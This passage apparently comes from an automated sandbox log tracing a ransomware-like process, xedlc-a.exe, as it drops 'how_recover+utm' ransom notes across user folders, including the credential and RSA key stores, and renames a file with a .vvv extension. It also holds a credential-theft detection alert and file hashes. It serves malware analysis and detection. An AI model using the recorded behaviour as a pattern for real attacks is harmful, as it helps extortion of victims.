48672.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48673.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48674.            ads:
48675.          fid (ads:): 281474976778258
48676.          ntstatus: 0x0
48677.          CreateOptions: 0x60
48678.        file:
48679.          timestamp: 70525
48680.          mode: close
48681.          sequenceNumber: 881
48682.          value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.html
48683.          filesize: 9495
48684.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48685.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48686.          processinfo:
48687.            pid: 1056
48688.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48689.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48690.            ads:
48691.          fid (ads:): 281474976778258
48692.          ntstatus: 0x0
48693.          CreateOptions: 0x0
48694.        folder:
48695.          timestamp: 70531
48696.          mode: open
48697.          sequenceNumber: 882
48698.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
48699.          processinfo:
48700.            pid: 1056
48701.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48702.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48703.          ntstatus: 0x0
48704.          CreateOptions: 0x21
48705.        file:
48706.          timestamp: 70537
48707.          mode: created
48708.          sequenceNumber: 883
48709.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
48710.          processinfo:
48711.            pid: 1056
48712.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48713.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48714.            ads:
48715.          fid (ads:): 281474976778259
48716.          ntstatus: 0x0
48717.          CreateOptions: 0x60
48718.        malicious-alert:
48719.          classtype: Data-Theft-Activity
48720.          weight: 0
48721.          ruleid: 2612 : Possible cached credentials theft ; Process creating files inside cached credentials directories
48722.          msg: Process creating files inside cached credentials directories
48723.          display-msg: Possible cached credentials theft
48724.        file:
48725.          timestamp: 70543
48726.          mode: close
48727.          sequenceNumber: 884
48728.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
48729.          filesize: 2682
48730.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48731.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48732.          processinfo:
48733.            pid: 1056
48734.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48736.            ads:
48737.          fid (ads:): 281474976778259
48738.          ntstatus: 0x0
48739.          CreateOptions: 0x0
48740.        file:
48741.          timestamp: 70563
48742.          mode: created
48743.          sequenceNumber: 885
48744.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
48745.          processinfo:
48746.            pid: 1056
48747.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48748.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48749.            ads:
48750.          fid (ads:): 281474976778260
48751.          ntstatus: 0x0
48752.          CreateOptions: 0x60
48753.        file:
48754.          timestamp: 70570
48755.          mode: close
48756.          sequenceNumber: 886
48757.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
48758.          filesize: 9495
48759.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48760.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48761.          processinfo:
48762.            pid: 1056
48763.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48764.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48765.            ads:
48766.          fid (ads:): 281474976778260
48767.          ntstatus: 0x0
48768.          CreateOptions: 0x0
48769.        file:
48770.          timestamp: 70577
48771.          mode: created
48772.          sequenceNumber: 887
48773.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.txt
48774.          processinfo:
48775.            pid: 1056
48776.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48777.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48778.            ads:
48779.          fid (ads:): 281474976778261
48780.          ntstatus: 0x0
48781.          CreateOptions: 0x60
48782.        file:
48783.          timestamp: 70583
48784.          mode: close
48785.          sequenceNumber: 888
48786.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.txt
48787.          filesize: 2682
48788.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48789.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48790.          processinfo:
48791.            pid: 1056
48792.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48794.            ads:
48795.          fid (ads:): 281474976778261
48796.          ntstatus: 0x0
48797.          CreateOptions: 0x0
48798.        file:
48799.          timestamp: 70606
48800.          mode: created
48801.          sequenceNumber: 889
48802.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.html
48803.          processinfo:
48804.            pid: 1056
48805.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48806.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48807.            ads:
48808.          fid (ads:): 281474976778262
48809.          ntstatus: 0x0
48810.          CreateOptions: 0x60
48811.        file:
48812.          timestamp: 70613
48813.          mode: close
48814.          sequenceNumber: 890
48815.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.html
48816.          filesize: 9495
48817.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48818.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48819.          processinfo:
48820.            pid: 1056
48821.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48822.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48823.            ads:
48824.          fid (ads:): 281474976778262
48825.          ntstatus: 0x0
48826.          CreateOptions: 0x0
48827.        file:
48828.          timestamp: 70659
48829.          mode: created
48830.          sequenceNumber: 891
48831.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
48832.          processinfo:
48833.            pid: 1056
48834.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48836.            ads:
48837.          fid (ads:): 281474976778263
48838.          ntstatus: 0x0
48839.          CreateOptions: 0x60
48840.        file:
48841.          timestamp: 70665
48842.          mode: close
48843.          sequenceNumber: 892
48844.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
48845.          filesize: 2682
48846.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48847.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48848.          processinfo:
48849.            pid: 1056
48850.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48851.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48852.            ads:
48853.          fid (ads:): 281474976778263
48854.          ntstatus: 0x0
48855.          CreateOptions: 0x0
48856.        file:
48857.          timestamp: 70673
48858.          mode: created
48859.          sequenceNumber: 893
48860.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
48861.          processinfo:
48862.            pid: 1056
48863.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48864.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48865.            ads:
48866.          fid (ads:): 281474976778264
48867.          ntstatus: 0x0
48868.          CreateOptions: 0x60
48869.        file:
48870.          timestamp: 70679
48871.          mode: close
48872.          sequenceNumber: 894
48873.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
48874.          filesize: 9495
48875.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48876.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48877.          processinfo:
48878.            pid: 1056
48879.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48880.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48881.            ads:
48882.          fid (ads:): 281474976778264
48883.          ntstatus: 0x0
48884.          CreateOptions: 0x0
48885.        file:
48886.          timestamp: 70686
48887.          mode: created
48888.          sequenceNumber: 895
48889.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.txt
48890.          processinfo:
48891.            pid: 1056
48892.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48893.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48894.            ads:
48895.          fid (ads:): 281474976778265
48896.          ntstatus: 0x0
48897.          CreateOptions: 0x60
48898.        file:
48899.          timestamp: 70692
48900.          mode: close
48901.          sequenceNumber: 896
48902.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.txt
48903.          filesize: 2682
48904.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48905.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48906.          processinfo:
48907.            pid: 1056
48908.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48910.            ads:
48911.          fid (ads:): 281474976778265
48912.          ntstatus: 0x0
48913.          CreateOptions: 0x0
48914.        file:
48915.          timestamp: 70699
48916.          mode: created
48917.          sequenceNumber: 897
48918.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.html
48919.          processinfo:
48920.            pid: 1056
48921.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48922.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48923.            ads:
48924.          fid (ads:): 281474976778266
48925.          ntstatus: 0x0
48926.          CreateOptions: 0x60
48927.        file:
48928.          timestamp: 70716
48929.          mode: close
48930.          sequenceNumber: 898
48931.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.html
48932.          filesize: 9495
48933.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48934.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48935.          processinfo:
48936.            pid: 1056
48937.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48939.            ads:
48940.          fid (ads:): 281474976778266
48941.          ntstatus: 0x0
48942.          CreateOptions: 0x0
48943.        file:
48944.          timestamp: 70723
48945.          mode: created
48946.          sequenceNumber: 899
48947.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.txt
48948.          processinfo:
48949.            pid: 1056
48950.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48951.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48952.            ads:
48953.          fid (ads:): 281474976778267
48954.          ntstatus: 0x0
48955.          CreateOptions: 0x60
48956.        file:
48957.          timestamp: 70728
48958.          mode: close
48959.          sequenceNumber: 900
48960.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.txt
48961.          filesize: 2682
48962.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48963.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48964.          processinfo:
48965.            pid: 1056
48966.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48967.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48968.            ads:
48969.          fid (ads:): 281474976778267
48970.          ntstatus: 0x0
48971.          CreateOptions: 0x0
48972.        file:
48973.          timestamp: 70735
48974.          mode: created
48975.          sequenceNumber: 901
48976.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.html
48977.          processinfo:
48978.            pid: 1056
48979.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48981.            ads:
48982.          fid (ads:): 281474976778268
48983.          ntstatus: 0x0
48984.          CreateOptions: 0x60
48985.        file:
48986.          timestamp: 70741
48987.          mode: close
48988.          sequenceNumber: 902
48989.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.html
48990.          filesize: 9495
48991.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48992.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48993.          processinfo:
48994.            pid: 1056
48995.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48997.            ads:
48998.          fid (ads:): 281474976778268
48999.          ntstatus: 0x0
49000.          CreateOptions: 0x0
49001.        file:
49002.          timestamp: 70748
49003.          mode: created
49004.          sequenceNumber: 903
49005.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.txt
49006.          processinfo:
49007.            pid: 1056
49008.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49009.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49010.            ads:
49011.          fid (ads:): 281474976778269
49012.          ntstatus: 0x0
49013.          CreateOptions: 0x60
49014.        file:
49015.          timestamp: 70754
49016.          mode: close
49017.          sequenceNumber: 904
49018.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.txt
49019.          filesize: 2682
49020.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49021.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49022.          processinfo:
49023.            pid: 1056
49024.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49026.            ads:
49027.          fid (ads:): 281474976778269
49028.          ntstatus: 0x0
49029.          CreateOptions: 0x0
49030.        file:
49031.          timestamp: 70784
49032.          mode: created
49033.          sequenceNumber: 905
49034.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.html
49035.          processinfo:
49036.            pid: 1056
49037.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49038.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49039.            ads:
49040.          fid (ads:): 281474976778270
49041.          ntstatus: 0x0
49042.          CreateOptions: 0x60
49043.        file:
49044.          timestamp: 70790
49045.          mode: close
49046.          sequenceNumber: 906
49047.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.html
49048.          filesize: 9495
49049.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49050.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49051.          processinfo:
49052.            pid: 1056
49053.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49054.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49055.            ads:
49056.          fid (ads:): 281474976778270
49057.          ntstatus: 0x0
49058.          CreateOptions: 0x0
49059.        file:
49060.          timestamp: 70797
49061.          mode: created
49062.          sequenceNumber: 907
49063.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.txt
49064.          processinfo:
49065.            pid: 1056
49066.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49067.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49068.            ads:
49069.          fid (ads:): 281474976778271
49070.          ntstatus: 0x0
49071.          CreateOptions: 0x60
49072.        file:
49073.          timestamp: 70803
49074.          mode: close
49075.          sequenceNumber: 908
49076.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.txt
49077.          filesize: 2682
49078.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49079.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49080.          processinfo:
49081.            pid: 1056
49082.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49083.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49084.            ads:
49085.          fid (ads:): 281474976778271
49086.          ntstatus: 0x0
49087.          CreateOptions: 0x0
49088.        file:
49089.          timestamp: 70811
49090.          mode: created
49091.          sequenceNumber: 909
49092.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.html
49093.          processinfo:
49094.            pid: 1056
49095.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49096.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49097.            ads:
49098.          fid (ads:): 281474976778272
49099.          ntstatus: 0x0
49100.          CreateOptions: 0x60
49101.        file:
49102.          timestamp: 70817
49103.          mode: close
49104.          sequenceNumber: 910
49105.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.html
49106.          filesize: 9495
49107.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49108.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49109.          processinfo:
49110.            pid: 1056
49111.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49113.            ads:
49114.          fid (ads:): 281474976778272
49115.          ntstatus: 0x0
49116.          CreateOptions: 0x0
49117.        file:
49118.          timestamp: 70825
49119.          mode: created
49120.          sequenceNumber: 911
49121.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.txt
49122.          processinfo:
49123.            pid: 1056
49124.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49126.            ads:
49127.          fid (ads:): 281474976778273
49128.          ntstatus: 0x0
49129.          CreateOptions: 0x60
49130.        file:
49131.          timestamp: 70831
49132.          mode: close
49133.          sequenceNumber: 912
49134.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.txt
49135.          filesize: 2682
49136.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49137.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49138.          processinfo:
49139.            pid: 1056
49140.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49141.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49142.            ads:
49143.          fid (ads:): 281474976778273
49144.          ntstatus: 0x0
49145.          CreateOptions: 0x0
49146.        file:
49147.          timestamp: 70838
49148.          mode: created
49149.          sequenceNumber: 913
49150.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.html
49151.          processinfo:
49152.            pid: 1056
49153.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49154.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49155.            ads:
49156.          fid (ads:): 281474976778274
49157.          ntstatus: 0x0
49158.          CreateOptions: 0x60
49159.        file:
49160.          timestamp: 70844
49161.          mode: close
49162.          sequenceNumber: 914
49163.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.html
49164.          filesize: 9495
49165.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49166.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49167.          processinfo:
49168.            pid: 1056
49169.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49170.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49171.            ads:
49172.          fid (ads:): 281474976778274
49173.          ntstatus: 0x0
49174.          CreateOptions: 0x0
49175.        file:
49176.          timestamp: 70851
49177.          mode: created
49178.          sequenceNumber: 915
49179.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.txt
49180.          processinfo:
49181.            pid: 1056
49182.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49183.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49184.            ads:
49185.          fid (ads:): 281474976778275
49186.          ntstatus: 0x0
49187.          CreateOptions: 0x60
49188.        file:
49189.          timestamp: 70856
49190.          mode: close
49191.          sequenceNumber: 916
49192.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.txt
49193.          filesize: 2682
49194.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49195.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49196.          processinfo:
49197.            pid: 1056
49198.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49199.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49200.            ads:
49201.          fid (ads:): 281474976778275
49202.          ntstatus: 0x0
49203.          CreateOptions: 0x0
49204.        file:
49205.          timestamp: 70978
49206.          mode: created
49207.          sequenceNumber: 917
49208.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.html
49209.          processinfo:
49210.            pid: 1056
49211.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49212.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49213.            ads:
49214.          fid (ads:): 281474976778276
49215.          ntstatus: 0x0
49216.          CreateOptions: 0x60
49217.        file:
49218.          timestamp: 70984
49219.          mode: close
49220.          sequenceNumber: 918
49221.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.html
49222.          filesize: 9495
49223.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49224.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49225.          processinfo:
49226.            pid: 1056
49227.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49228.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49229.            ads:
49230.          fid (ads:): 281474976778276
49231.          ntstatus: 0x0
49232.          CreateOptions: 0x0
49233.        file:
49234.          timestamp: 71039
49235.          mode: created
49236.          sequenceNumber: 919
49237.          value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.txt
49238.          processinfo:
49239.            pid: 1056
49240.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49241.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49242.            ads:
49243.          fid (ads:): 281474976778277
49244.          ntstatus: 0x0
49245.          CreateOptions: 0x60
49246.        file:
49247.          timestamp: 71046
49248.          mode: close
49249.          sequenceNumber: 920
49250.          value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.txt
49251.          filesize: 2682
49252.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49253.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49254.          processinfo:
49255.            pid: 1056
49256.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49257.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49258.            ads:
49259.          fid (ads:): 281474976778277
49260.          ntstatus: 0x0
49261.          CreateOptions: 0x0
49262.        file:
49263.          timestamp: 71056
49264.          mode: created
49265.          sequenceNumber: 921
49266.          value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.html
49267.          processinfo:
49268.            pid: 1056
49269.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49270.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49271.            ads:
49272.          fid (ads:): 281474976778278
49273.          ntstatus: 0x0
49274.          CreateOptions: 0x60
49275.        file:
49276.          timestamp: 71062
49277.          mode: close
49278.          sequenceNumber: 922
49279.          value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.html
49280.          filesize: 9495
49281.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49282.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49283.          processinfo:
49284.            pid: 1056
49285.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49286.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49287.            ads:
49288.          fid (ads:): 281474976778278
49289.          ntstatus: 0x0
49290.          CreateOptions: 0x0
49291.        file:
49292.          timestamp: 71113
49293.          mode: created
49294.          sequenceNumber: 923
49295.          value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.txt
49296.          processinfo:
49297.            pid: 1056
49298.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49299.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49300.            ads:
49301.          fid (ads:): 281474976778279
49302.          ntstatus: 0x0
49303.          CreateOptions: 0x60
49304.        file:
49305.          timestamp: 71120
49306.          mode: close
49307.          sequenceNumber: 924
49308.          value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.txt
49309.          filesize: 2682
49310.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49311.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49312.          processinfo:
49313.            pid: 1056
49314.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49316.            ads:
49317.          fid (ads:): 281474976778279
49318.          ntstatus: 0x0
49319.          CreateOptions: 0x0
49320.        file:
49321.          timestamp: 71137
49322.          mode: created
49323.          sequenceNumber: 925
49324.          value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.html
49325.          processinfo:
49326.            pid: 1056
49327.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49328.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49329.            ads:
49330.          fid (ads:): 281474976778280
49331.          ntstatus: 0x0
49332.          CreateOptions: 0x60
49333.        file:
49334.          timestamp: 71143
49335.          mode: close
49336.          sequenceNumber: 926
49337.          value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.html
49338.          filesize: 9495
49339.          md5sum: 95f596a25dff51b6af2042b1bbe02985
49340.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
49341.          processinfo:
49342.            pid: 1056
49343.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49344.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49345.            ads:
49346.          fid (ads:): 281474976778280
49347.          ntstatus: 0x0
49348.          CreateOptions: 0x0
49349.        file:
49350.          timestamp: 71150
49351.          mode: open
49352.          sequenceNumber: 927
49353.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
49354.          filesize: 10381
49355.          processinfo:
49356.            pid: 1056
49357.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49359.            ads:
49360.          fid (ads:): 281474976720131
49361.          ntstatus: 0x0
49362.          CreateOptions: 0x60
49363.        file:
49364.          timestamp: 71230
49365.          mode: close
49366.          sequenceNumber: 928
49367.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
49368.          filesize: 10798
49369.          md5sum: 66442d1cfc77aae37d37aef06c0221cb
49370.          sha1sum: 2f7006e0c4d2a4c7b96d2e62fe2e700727a15b8a
49371.          processinfo:
49372.            pid: 1056
49373.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49374.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49375.            ads:
49376.          fid (ads:): 281474976720131
49377.          ntstatus: 0x0
49378.          CreateOptions: 0x0
49379.        file:
49380.          timestamp: 71282
49381.          mode: rename
49382.          sequenceNumber: 929
49383.          filesize: 10798
49384.          md5sum: 66442d1cfc77aae37d37aef06c0221cb
49385.          sha1sum: 2f7006e0c4d2a4c7b96d2e62fe2e700727a15b8a
49386.          processinfo:
49387.            pid: 1056
49388.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49389.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49390.          old_name: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
49391.          new_name: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt.vvv
49392.            ads:
49393.          fid (ads:): 281474976720131
49394.          ntstatus: 0x0
49395.          CreateOptions: 0x0
49396.        file:
49397.          timestamp: 71291
49398.          mode: created
49399.          sequenceNumber: 930
49400.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.txt
49401.          processinfo:
49402.            pid: 1056
49403.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49404.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49405.            ads:
49406.          fid (ads:): 281474976778281
49407.          ntstatus: 0x0
49408.          CreateOptions: 0x60
49409.        file:
49410.          timestamp: 71297
49411.          mode: close
49412.          sequenceNumber: 931
49413.          value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.txt
49414.          filesize: 2682
49415.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
49416.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
49417.          processinfo:
49418.            pid: 1056
49419.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
49420.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
49421.            ads:
49422.          fid (ads:): 281474976778281
